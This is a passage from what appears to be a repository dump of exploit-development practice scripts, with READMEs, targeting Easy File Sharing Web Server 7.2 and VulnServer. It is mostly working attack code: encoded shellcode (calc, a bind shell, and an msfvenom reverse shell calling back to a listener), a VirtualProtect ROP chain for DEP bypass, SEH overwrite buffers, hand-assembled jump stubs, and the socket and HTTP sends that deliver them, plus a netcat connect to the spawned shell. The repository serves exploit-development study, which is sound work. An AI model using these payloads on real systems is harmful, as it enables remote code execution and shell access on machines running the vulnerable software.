\"\\x71\\x6c\\x4d\\x4f\\x75\\x48\\x32\\x57\\x70\\x77\\x70\\x43\"\nshellcode += \"\\x30\\x66\\x30\\x61\\x78\\x46\\x51\\x6e\\x6b\\x70\\x6f\\x6e\"\nshellcode += \"\\x67\\x59\\x6f\\x6b\\x65\\x4f\\x4b\\x78\\x70\\x6d\\x65\\x39\"\nshellcode += 
\"\\x32\\x50\\x56\\x73\\x58\\x6c\\x66\\x6c\\x55\\x4d\\x6d\\x6d\"\nshellcode += \"\\x4d\\x49\\x6f\\x49\\x45\\x65\\x6c\\x45\\x56\\x73\\x4c\\x45\"\nshellcode += \"\\x5a\\x6b\\x30\\x6b\\x4b\\x39\\x70\\x53\\x45\\x34\\x45\\x4d\"\nshellcode += \"\\x6b\\x42\\x67\\x65\\x43\\x63\\x42\\x70\\x6f\\x50\\x6a\\x37\"\nshellcode += \"\\x70\\x66\\x33\\x6b\\x4f\\x69\\x45\\x30\\x63\\x35\\x31\\x72\"\nshellcode += \"\\x4c\\x65\\x33\\x76\\x4e\\x75\\x35\\x42\\x58\\x45\\x35\\x67\"\nshellcode += \"\\x70\\x41\\x41\"\n\n# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]\nbuffer  = '\\x41' * (2647-128)                # filler to where ESP will point after stack pivot (see SEH gadget)\n\n# mona.py VirtualProtect() ROP template with few modifications \n\n# ESI = ptr to VirtualProtect()\nbuffer += struct.pack('<L', 0x10015442)      # POP EAX # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x61c832d0)      # ptr to &VirtualProtect() [IAT sqlite3.dll]\nbuffer += struct.pack('<L', 0x1002248c)      # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x61c18d81)      # XCHG EAX,EDI # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x1001d626)      # XOR ESI,ESI # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x10021a3e)      # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]\n\n# EBP = ReturnTo (ptr to jmp esp)\nbuffer += struct.pack('<L', 0x1001add7)      # POP EBP # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x61c24169)      # & push esp # ret  [sqlite3.dll]\n\n# EDX = NewProtect (0x40)\nbuffer += struct.pack('<L', 0x10022c4c)       # XOR EDX,EDX # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += 
struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer 
+= struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN 
[sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\nbuffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]\n\n# ECX = lpOldProtect (ptr to W address)\nbuffer += struct.pack('<L', 0x1001b377)      # POP ECX # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x61c730ad)      # &Writable location [sqlite3.dll]\n\n# EBX = dwSize (0x00000501)\nbuffer += struct.pack('<L', 0x10015442)\t     # POP EAX # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0xfffffaff)      # will become 0x00000501 after negate\nbuffer += struct.pack('<L', 0x100231d1)\t     # NEG EAX # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x1001da09)      # ADD 
EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x1001a858)      # RETN (ROP NOP) [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x1001a858)      # RETN (ROP NOP) [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x10015442)\t     # POP EAX # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x61c730ad)      # &Writable location [sqlite3.dll]\n\n# EDI = ROP NOP (RETN)\nbuffer += struct.pack('<L', 0x10019f47)      # POP EDI # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x1001a858)      # RETN (ROP NOP) [ImageLoad.dll]\n\n# EAX = NOP (0x90909090)\nbuffer += struct.pack('<L', 0x10015442)      # POP EAX # RETN [ImageLoad.dll]\nbuffer += struct.pack('<L', 0x90909090)      # nop\nbuffer += struct.pack('<L', 0x100240c2)      # PUSHAD # RETN [ImageLoad.dll]\n\nbuffer += \"\\x90\" * 50                        # nop\nbuffer += shellcode                          # calc.exe\nbuffer += \"\\x90\" * 50                        # nop\n\nbuffer += '\\x45' * (1412-(4*88)+128-len(shellcode)-100) \nbuffer += '\\x42' * 4                         # nSEH filler\n\n# stack pivot that will land somewhere in buffer of As\nbuffer += struct.pack('<L', 0x10022869)      # SEH ADD ESP,1004 # RETN [ImageLoad.dll]\n\nbuffer += '\\x44' * (5000-4059-4-4)\n\nprint \"[+] Sending %s bytes of evil payload..\" %len(buffer)\ntime.sleep(1)\n\ntry:\n\tcookies = dict(SESSIONID='6771', UserID=buffer,PassWD='')\n\tdata=dict(frmLogin='',frmUserName='',frmUserPass='',login='')\n\trequests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)\nexcept:\n\tprint \"The server stopped responding. You should see calc.exe by now ;D\"\n"
  },
  {
    "path": "Remote Buffer Overflow/EasyFileSharingWebServerv7.2/readme.md",
    "content": "### Easy File Sharing Web Server v7.2\nRemote SEH-based buffer overflow exploit with a DEP bypass (ROP chain calling the VirtualProtect() API). See the exploit on exploit-db [EDB-ID: 44522](https://www.exploit-db.com/exploits/44522/)\n\nNote: the ROP chain hard-codes gadget addresses from ImageLoad.dll and sqlite3.dll as loaded on the tested Windows 7 Enterprise SP1 (x86) target, and the target host/port are hard-coded in Exploit.py; both must be adjusted for any other environment.\n\n![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/EasyFileSharingWebServerv7.2/PoC.PNG)\n"
  },
  {
    "path": "Remote Buffer Overflow/VulnServer/Bad Characters/Exploit.py",
    "content": "import time\nimport socket\nimport subprocess\n\n'''\nNotes:\n======\n- Bad characters are everything beyond '\\x7f' and obviously '\\x00'\n- Bad character '\\xff' get converted to '\\x80' by vulnserver, which will use for the backward jump ;)\n- Manual shellcoding is required to jump to the start of shellcode\n- Used Slink alphanumeric encoder found in https://github.com/ihack4falafel/Slink, whomever made this tool must be 1337 ;)\n'''\n\n#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00' -e x86/alpha_mixed BufferRegister=ESI -f python -v shellcode \n#Payload size: 710 bytes\nshellcode =  \"\"\nshellcode += \"\\x56\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\nshellcode += \"\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\"\nshellcode += \"\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\"\nshellcode += \"\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\"\nshellcode += \"\\x42\\x75\\x4a\\x49\\x49\\x6c\\x68\\x68\\x4b\\x32\\x77\\x70\"\nshellcode += \"\\x37\\x70\\x53\\x30\\x45\\x30\\x6d\\x59\\x59\\x75\\x70\\x31\"\nshellcode += \"\\x79\\x50\\x53\\x54\\x6e\\x6b\\x72\\x70\\x46\\x50\\x4c\\x4b\"\nshellcode += \"\\x30\\x52\\x66\\x6c\\x4c\\x4b\\x53\\x62\\x54\\x54\\x4c\\x4b\"\nshellcode += \"\\x50\\x72\\x67\\x58\\x76\\x6f\\x58\\x37\\x63\\x7a\\x76\\x46\"\nshellcode += \"\\x34\\x71\\x69\\x6f\\x4e\\x4c\\x67\\x4c\\x55\\x31\\x53\\x4c\"\nshellcode += \"\\x56\\x62\\x46\\x4c\\x75\\x70\\x4f\\x31\\x58\\x4f\\x44\\x4d\"\nshellcode += \"\\x46\\x61\\x49\\x57\\x6a\\x42\\x78\\x72\\x33\\x62\\x72\\x77\"\nshellcode += \"\\x4e\\x6b\\x73\\x62\\x34\\x50\\x4e\\x6b\\x43\\x7a\\x77\\x4c\"\nshellcode += \"\\x4c\\x4b\\x32\\x6c\\x74\\x51\\x53\\x48\\x59\\x73\\x30\\x48\"\nshellcode += \"\\x63\\x31\\x4b\\x61\\x52\\x71\\x4c\\x4b\\x50\\x59\\x61\\x30\"\nshellcode += \"\\x66\\x61\\x7a\\x73\\x6c\\x4b\\x50\\x49\\x65\\x48\\x38\\x63\"\nshellcode += \"\\x57\\x4a\\x63\\x79\\x4e\\x6b\\x64\\x74\\x6e\\x6b\\x73\\x31\"\nshellcode += 
\"\\x68\\x56\\x45\\x61\\x49\\x6f\\x6c\\x6c\\x5a\\x61\\x78\\x4f\"\nshellcode += \"\\x46\\x6d\\x37\\x71\\x69\\x57\\x75\\x68\\x4d\\x30\\x63\\x45\"\nshellcode += \"\\x69\\x66\\x33\\x33\\x31\\x6d\\x49\\x68\\x67\\x4b\\x43\\x4d\"\nshellcode += \"\\x35\\x74\\x44\\x35\\x48\\x64\\x52\\x78\\x6c\\x4b\\x56\\x38\"\nshellcode += \"\\x34\\x64\\x57\\x71\\x4e\\x33\\x65\\x36\\x6e\\x6b\\x36\\x6c\"\nshellcode += \"\\x32\\x6b\\x6c\\x4b\\x70\\x58\\x35\\x4c\\x53\\x31\\x5a\\x73\"\nshellcode += \"\\x6e\\x6b\\x46\\x64\\x4c\\x4b\\x63\\x31\\x4a\\x70\\x4f\\x79\"\nshellcode += \"\\x70\\x44\\x66\\x44\\x55\\x74\\x43\\x6b\\x43\\x6b\\x53\\x51\"\nshellcode += \"\\x31\\x49\\x31\\x4a\\x50\\x51\\x39\\x6f\\x79\\x70\\x73\\x6f\"\nshellcode += \"\\x53\\x6f\\x62\\x7a\\x6e\\x6b\\x32\\x32\\x48\\x6b\\x6c\\x4d\"\nshellcode += \"\\x31\\x4d\\x50\\x68\\x76\\x53\\x57\\x42\\x63\\x30\\x63\\x30\"\nshellcode += \"\\x32\\x48\\x71\\x67\\x62\\x53\\x67\\x42\\x63\\x6f\\x32\\x74\"\nshellcode += \"\\x35\\x38\\x42\\x6c\\x52\\x57\\x64\\x66\\x34\\x47\\x79\\x6f\"\nshellcode += \"\\x38\\x55\\x58\\x38\\x6c\\x50\\x36\\x61\\x53\\x30\\x55\\x50\"\nshellcode += \"\\x66\\x49\\x58\\x44\\x32\\x74\\x36\\x30\\x55\\x38\\x35\\x79\"\nshellcode += \"\\x4d\\x50\\x42\\x4b\\x37\\x70\\x69\\x6f\\x49\\x45\\x61\\x7a\"\nshellcode += \"\\x64\\x48\\x56\\x39\\x66\\x30\\x59\\x72\\x69\\x6d\\x71\\x50\"\nshellcode += \"\\x30\\x50\\x37\\x30\\x46\\x30\\x35\\x38\\x4b\\x5a\\x54\\x4f\"\nshellcode += \"\\x59\\x4f\\x49\\x70\\x59\\x6f\\x7a\\x75\\x4d\\x47\\x73\\x58\"\nshellcode += \"\\x54\\x42\\x67\\x70\\x32\\x31\\x71\\x4c\\x6c\\x49\\x79\\x76\"\nshellcode += \"\\x52\\x4a\\x44\\x50\\x32\\x76\\x72\\x77\\x72\\x48\\x59\\x52\"\nshellcode += \"\\x69\\x4b\\x67\\x47\\x31\\x77\\x39\\x6f\\x59\\x45\\x30\\x57\"\nshellcode += \"\\x73\\x58\\x78\\x37\\x6a\\x49\\x54\\x78\\x69\\x6f\\x59\\x6f\"\nshellcode += \"\\x68\\x55\\x32\\x77\\x70\\x68\\x53\\x44\\x4a\\x4c\\x57\\x4b\"\nshellcode += \"\\x68\\x61\\x4b\\x4f\\x4e\\x35\\x33\\x67\\x4a\\x37\\x63\\x58\"\nshellcode += 
\"\\x50\\x75\\x52\\x4e\\x62\\x6d\\x51\\x71\\x79\\x6f\\x6e\\x35\"\nshellcode += \"\\x53\\x58\\x50\\x63\\x62\\x4d\\x63\\x54\\x73\\x30\\x4f\\x79\"\nshellcode += \"\\x69\\x73\\x31\\x47\\x43\\x67\\x52\\x77\\x36\\x51\\x48\\x76\"\nshellcode += \"\\x43\\x5a\\x56\\x72\\x51\\x49\\x31\\x46\\x7a\\x42\\x6b\\x4d\"\nshellcode += \"\\x30\\x66\\x6f\\x37\\x73\\x74\\x74\\x64\\x77\\x4c\\x56\\x61\"\nshellcode += \"\\x47\\x71\\x4e\\x6d\\x62\\x64\\x76\\x44\\x44\\x50\\x79\\x56\"\nshellcode += \"\\x63\\x30\\x32\\x64\\x61\\x44\\x42\\x70\\x66\\x36\\x31\\x46\"\nshellcode += \"\\x36\\x36\\x42\\x66\\x30\\x56\\x30\\x4e\\x70\\x56\\x53\\x66\"\nshellcode += \"\\x63\\x63\\x62\\x76\\x42\\x48\\x62\\x59\\x38\\x4c\\x67\\x4f\"\nshellcode += \"\\x6d\\x56\\x39\\x6f\\x6a\\x75\\x6d\\x59\\x59\\x70\\x42\\x6e\"\nshellcode += \"\\x71\\x46\\x30\\x46\\x4b\\x4f\\x34\\x70\\x75\\x38\\x76\\x68\"\nshellcode += \"\\x4c\\x47\\x67\\x6d\\x53\\x50\\x4b\\x4f\\x7a\\x75\\x6d\\x6b\"\nshellcode += \"\\x58\\x70\\x38\\x35\\x4d\\x72\\x43\\x66\\x35\\x38\\x6c\\x66\"\nshellcode += \"\\x6a\\x35\\x4f\\x4d\\x4d\\x4d\\x6b\\x4f\\x79\\x45\\x77\\x4c\"\nshellcode += \"\\x43\\x36\\x63\\x4c\\x46\\x6a\\x4f\\x70\\x69\\x6b\\x4d\\x30\"\nshellcode += \"\\x71\\x65\\x54\\x45\\x4f\\x4b\\x73\\x77\\x47\\x63\\x51\\x62\"\nshellcode += \"\\x70\\x6f\\x30\\x6a\\x33\\x30\\x66\\x33\\x69\\x6f\\x39\\x45\"\nshellcode += \"\\x41\\x41\"\n\nbuffer  = 'LTER /.:/'\nbuffer += shellcode\nbuffer += '\\x41' * (3495-124-len(shellcode))\nbuffer += '\\x54'                          # PUSH ESP                     * point esp to where we want the encoder to dump otherwise bad shellcode\nbuffer += '\\x58'                          # POP EAX\nbuffer += '\\x05\\x55\\x11\\x11\\x11'          # ADD EAX,11111155\nbuffer += '\\x05\\x55\\x11\\x11\\x11'          # ADD EAX,11111155\nbuffer += '\\x2D\\x25\\x11\\x22\\x22'          # SUB EAX,22221125\nbuffer += '\\x54'                          # PUSH ESP                     * save esp to esi before encoder alignement \nbuffer += '\\x5E'        
                  # POP ESI\nbuffer += '\\x50'                          # PUSH EAX\nbuffer += '\\x5c'                          # pop esp                      \nbuffer += \"\\x25\\x4A\\x4D\\x4E\\x55\"          ## and  eax, 0x554e4d4a        * after the encoder is done we will end up with the following code\nbuffer += \"\\x25\\x35\\x32\\x31\\x2A\"          ## and  eax, 0x2a313235          8BE6             MOV ESP,ESI   # restore ESP\nbuffer += \"\\x05\\x77\\x63\\x41\\x41\"          ## add  eax, 0x41416377          81C6 E5030000    ADD ESI,3E5   # add offset to shellcode form ESP to ESI\nbuffer += \"\\x05\\x66\\x53\\x41\\x41\"          ## add  eax, 0x41415366          FFE6             JMP ESI       # jump to ESI\nbuffer += \"\\x05\\x55\\x63\\x41\\x41\"          ## add  eax, 0x41416355\nbuffer += \"\\x2D\\x33\\x33\\x33\\x33\"          ## sub  eax, 0x33333333\nbuffer += \"\\x50\"                          ## push eax\nbuffer += \"\\x25\\x4A\\x4D\\x4E\\x55\"          ## and  eax, 0x554e4d4a\nbuffer += \"\\x25\\x35\\x32\\x31\\x2A\"          ## and  eax, 0x2a313235\nbuffer += \"\\x05\\x63\\x12\\x11\\x11\"          ## add  eax, 0x11111263\nbuffer += \"\\x05\\x53\\x12\\x11\\x11\"          ## add  eax, 0x11111253\nbuffer += \"\\x05\\x62\\x12\\x11\\x11\"          ## add  eax, 0x11111262\nbuffer += \"\\x2D\\x33\\x33\\x33\\x33\"          ## sub  eax, 0x33333333\nbuffer += \"\\x50\"                          ## push eax\nbuffer += \"\\x25\\x4A\\x4D\\x4E\\x55\"          ## and  eax, 0x554e4d4a\nbuffer += \"\\x25\\x35\\x32\\x31\\x2A\"          ## and  eax, 0x2a313235\nbuffer += \"\\x05\\x46\\x73\\x41\\x63\"          ## add  eax, 0x63417346\nbuffer += \"\\x05\\x45\\x73\\x40\\x63\"          ## add  eax, 0x63407345\nbuffer += \"\\x50\"                          ## push eax\nbuffer += '\\x41' * (124-73-31)            # backward jump buffer space\nbuffer += '\\x75\\xff\\x74\\xff'              # nSEH | jump backwards (always true)\nbuffer += '\\x2b\\x17\\x50\\x62'              # SEH  | 
6250172B pop,pop,retn - clean address\nbuffer += '\\x41' * (5000-9-3495-4-4)      # junk\n\ntry:\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.connect(('192.168.0.15', 9999))\n\tprint '[+] Sending %s bytes of evil buffer..' %len(buffer)\n\ts.send(buffer)\n\ttime.sleep(5)\n\tsubprocess.call(['nc -nv 192.168.0.15 4444'], shell=True)\nexcept Exception as e:\n\tprint e\n"
  },
  {
    "path": "Remote Buffer Overflow/VulnServer/Bad Characters/README.md",
    "content": "Structured Exception Handler (SEH) overwrite in VulnServer's `LTER` command, with a restricted character set (`\\x00` and every byte above `\\x7f` are bad) and a small usable buffer, so the shellcode is alphanumeric-encoded and reached via a hand-written backward jump.\n\n<p align=\"center\">\n  <img src=\"https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/Bad%20Characters/PoC.gif\">\n</p>\n"
  },
  {
    "path": "Remote Buffer Overflow/VulnServer/CALL [REG]/Exploit.py",
    "content": "#!/usr/share/python\n\nimport struct\nimport time\nimport socket\nfrom pwn import *\n\ndef BufferOverflow():\n\n\t# https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html\n\tshellcode  = \"\"\n\tshellcode += \"\\x31\\xdb\\x64\\x8b\\x7b\\x30\\x8b\\x7f\"\n\tshellcode += \"\\x0c\\x8b\\x7f\\x1c\\x8b\\x47\\x08\\x8b\"\n\tshellcode += \"\\x77\\x20\\x8b\\x3f\\x80\\x7e\\x0c\\x33\"\n\tshellcode += \"\\x75\\xf2\\x89\\xc7\\x03\\x78\\x3c\\x8b\"\n\tshellcode += \"\\x57\\x78\\x01\\xc2\\x8b\\x7a\\x20\\x01\"\n\tshellcode += \"\\xc7\\x89\\xdd\\x8b\\x34\\xaf\\x01\\xc6\"\n\tshellcode += \"\\x45\\x81\\x3e\\x43\\x72\\x65\\x61\\x75\"\n\tshellcode += \"\\xf2\\x81\\x7e\\x08\\x6f\\x63\\x65\\x73\"\n\tshellcode += \"\\x75\\xe9\\x8b\\x7a\\x24\\x01\\xc7\\x66\"\n\tshellcode += \"\\x8b\\x2c\\x6f\\x8b\\x7a\\x1c\\x01\\xc7\"\n\tshellcode += \"\\x8b\\x7c\\xaf\\xfc\\x01\\xc7\\x89\\xd9\"\n\tshellcode += \"\\xb1\\xff\\x53\\xe2\\xfd\\x68\\x63\\x61\"\n\tshellcode += \"\\x6c\\x63\\x89\\xe2\\x52\\x52\\x53\\x53\"\n\tshellcode += \"\\x53\\x53\\x53\\x53\\x52\\x53\\xff\\xd7\"\n\n\t#----------------------------#\n\t#           Payload          #\n\t#----------------------------#\n\t# buffer = CMD + AAA padding # |---------------------------------------------------------+\n\t# buffer = EIP overwrite     # |-------| WinXP SP3 Pro : \"\\xFF\\xE4\" | [essfunc.dll] |----|-+\n\t# buffer = NOP sled          # |---------------------------------------------------------|-|-+\n\t# buffer = Shellcode         # |---------------------------------------------------------|-|-|-+\n\t# buffer = BBB padding       # |---------------------------------------------------------|-|-|-|-+\n\t#----------------------------#                                                           | | | | |\n\t#                                                                                        | | | | |\n\tbuffer  = \"TRUN .\" + \"A\" * 2006                    # 
<-----------------------------------+ | | | |\n\tbuffer += struct.pack('<L', 0x625011af)            # <-------------------------------------+ | | |\n\tbuffer += \"\\x90\" * 40                              # <---------------------------------------+ | |\n\tbuffer += shellcode                                # <-----------------------------------------+ |\n\tbuffer += \"B\" * (3000-6-2006-4-40-len(shellcode))  # <-------------------------------------------+\n\n\ttry:\n\t\tr = remote('192.168.199.140', 9999)\n\t\tr.recv(2048)\n\t\tprint \"[+] Sending %s bytes evil payload..\" %len(buffer)\n\t\tr.send(buffer)\n\texcept:\n\t\tprint \"Couldn't connect to target!\"\n\ndef main():\n\n\tprint (\n\t'''\n\t+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+\n\t|V|u|l|n|S|e|r|v|e|r| |R|e|m|o|t|e| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|\n\t+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+\n\t'''\n    )\n\tBufferOverflow()\n\nif __name__ == '__main__':\n\tmain()\n"
  },
  {
    "path": "Remote Buffer Overflow/VulnServer/Egg Hunter/Exploit.py",
    "content": "import time\nimport socket\nimport subprocess\n\n\n# root@kali:~# msfvenom -p windows/shell_reverse_tcp lhost=192.168.80.151 lport=1337 -b '\\x00\\x0a\\x0d' -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode\n# No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n# No Arch selected, selecting Arch: x86 from the payload\n# Found 1 compatible encoders\n# Attempting to encode payload with 1 iterations of x86/alpha_mixed\n# x86/alpha_mixed succeeded with size 702 (iteration=0)\n# x86/alpha_mixed chosen with final size 702\n# Payload size: 702 bytes\n# Final size of python file: 3768 bytes\nshellcode =  \"\"\nshellcode += \"\\x57\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\nshellcode += \"\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\"\nshellcode += \"\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\"\nshellcode += \"\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\"\nshellcode += \"\\x42\\x75\\x4a\\x49\\x49\\x6c\\x6a\\x48\\x4e\\x62\\x75\\x50\"\nshellcode += \"\\x57\\x70\\x73\\x30\\x31\\x70\\x4b\\x39\\x48\\x65\\x74\\x71\"\nshellcode += \"\\x59\\x50\\x55\\x34\\x4c\\x4b\\x42\\x70\\x66\\x50\\x6c\\x4b\"\nshellcode += \"\\x53\\x62\\x76\\x6c\\x4e\\x6b\\x53\\x62\\x46\\x74\\x6e\\x6b\"\nshellcode += \"\\x53\\x42\\x56\\x48\\x76\\x6f\\x6c\\x77\\x72\\x6a\\x46\\x46\"\nshellcode += 